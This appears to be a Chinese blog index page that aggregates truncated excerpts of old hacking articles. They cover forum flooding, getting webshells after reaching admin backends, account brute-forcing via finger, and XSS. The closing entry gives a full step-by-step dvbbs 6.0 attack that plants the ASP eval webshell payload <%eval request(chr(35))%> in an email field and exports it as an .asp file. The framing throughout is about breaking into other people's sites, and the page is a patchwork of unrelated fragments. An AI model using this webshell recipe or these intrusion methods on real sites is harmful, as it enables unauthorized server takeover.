C语言简单实现克隆帐户
文章作者:zhouzhen[E.S.T]
信息来源:邪恶八进制信息安全团队
文章作者:zhouzhen[E.S.T]
信息来源:邪恶八进制信息安全团队
文章作者:罗清篮
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注意:本文章05年12期黑防已发 注意版权
百度,作为国内搜索引擎的大户,为了进一步扩大自己的用户群,专门开设了“百度贴吧”(2003年11月百度贴吧 (http://post.baidu.com)自从诞生以来逐渐成为世界最大的中文交流平台!当用户在百度搜索引擎中搜索出需要搜索的关键字,点击“贴吧”即可进入以关键字为专题的相应贴吧)的服务。操作简单而又针对性,这是贴吧火极一时的重要原因,可正因为如此,百度贴吧的安全性又怎么样呢?这就是我们今天探讨的话题!
相信大家都有在论坛灌水的经历吧?但是如果你连续发表统一内容的东西在论坛中,不久论坛的整个板块就全是你发表的信息了,其他信息全被挤在了后面。假设你发表的信息够多,版主都删不完时,那么这个论坛基本就报废了!其他的商业论坛也意识到了防止恶意灌水的重要性 阅读全文 »
作者:9xiao[F.S.T] lin[F.S.T] 来源:火狐技术联盟
前 言
动网上传漏洞,相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下,现在这种漏洞已经基本比较难见到了,不排除一些小网站仍然存在此漏洞。在拿站过程中,我们经常费了九牛两虎之力拿到管理员帐号和密码,并顺利进入了后台,虽然此时与拿到网站webshell还有一步之遥,但还是有许多新手因想不出合适的方法而被拒之门外。因此,我们把常用的从后台得到webshell的方法进行了总结和归纳,大体情况有以下十大方面。
注意:如何进入后台,不是本文讨论范围,其具体方法就不说了,靠大家去自己发挥。此文参考了前人的多方面的资料和信息,在此一并表示感谢。
一、直接上传获得webshell
这种对php和jsp的一些程序比较常见,MolyX 阅读全文 »
随着Google推出多语言版本的Google个性化新闻页面以及Google Reader的改进,使用Google来阅读RSS的人也在逐步增加。如果要想在你的Blog上添加上订阅到Google的快捷按键,可以直接到这个页面提交你的Feed,再将生成的html代码拷贝到你的Blog模板上,就可以让读者方便地订阅你的Blog了。
比如,我的Blog的订阅到Google快捷按键的代码:
阅读全文 »
来自:华夏Blog
Once upon a time,我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,从aaa帐号试到zzz(bye the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比,如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果一个帐号也不存在,我没有再试它的帐号。因为我被它开的端口吸引住了,它开着WWW,我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在,我KAO,I服了YOU!也有几个错误,我不知道如何利用,算了。又绕着主机转了几圈,象狐狸遇见刺猬,无从下嘴。
还是看看root的信息吧:finger [email protected]
Login name: root In real life: system PRIVILEGED account
阅读全文 »
文章作者:HaK_BaN[BCT](www.cnbct.org)
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
备注:本文已经刊登在9月《黑客手册》中,转载时请标明出处以及文章完整性,本文首发漏洞中心小组,后作者友情提交到邪恶八进制。
在开始读该篇文章的时候,请大家首先了解一下关于本文所提及到相关知识以及原理.
(跨站脚本攻击的详细解释)
跨站脚本攻击又名CSS/XSS,就是利用ASP等等的文件设置和编写时的错误或者疏忽不当,攻击者就可以利用这些来达到自己攻击目的,如果一个服务器存在这些漏洞,那么它的沦陷也是时间的问题!
这些文本文件一般都是要结合数据库来使用的,这些数据库有ACCESS、MSSQL、MYSQL、Oracle等!脚本攻击就是针对这些数据库来配合脚本对一些变量的过滤不严的问题来达到得到用户密码等敏感信息,修改数据库等目的!
在现在的形式来说,CS 阅读全文 »
来自:Bluelight的小窝
for dvbbs 6.0
进入后台后 ,先到用户管理 ,随便改个人的邮件地址为,<%eval request(chr(35))%>@163.com
保存后,找到邮件列表导出,然后导出邮件列表到文本 把文件名的名字改为.asp,点导出,就得到了一个shell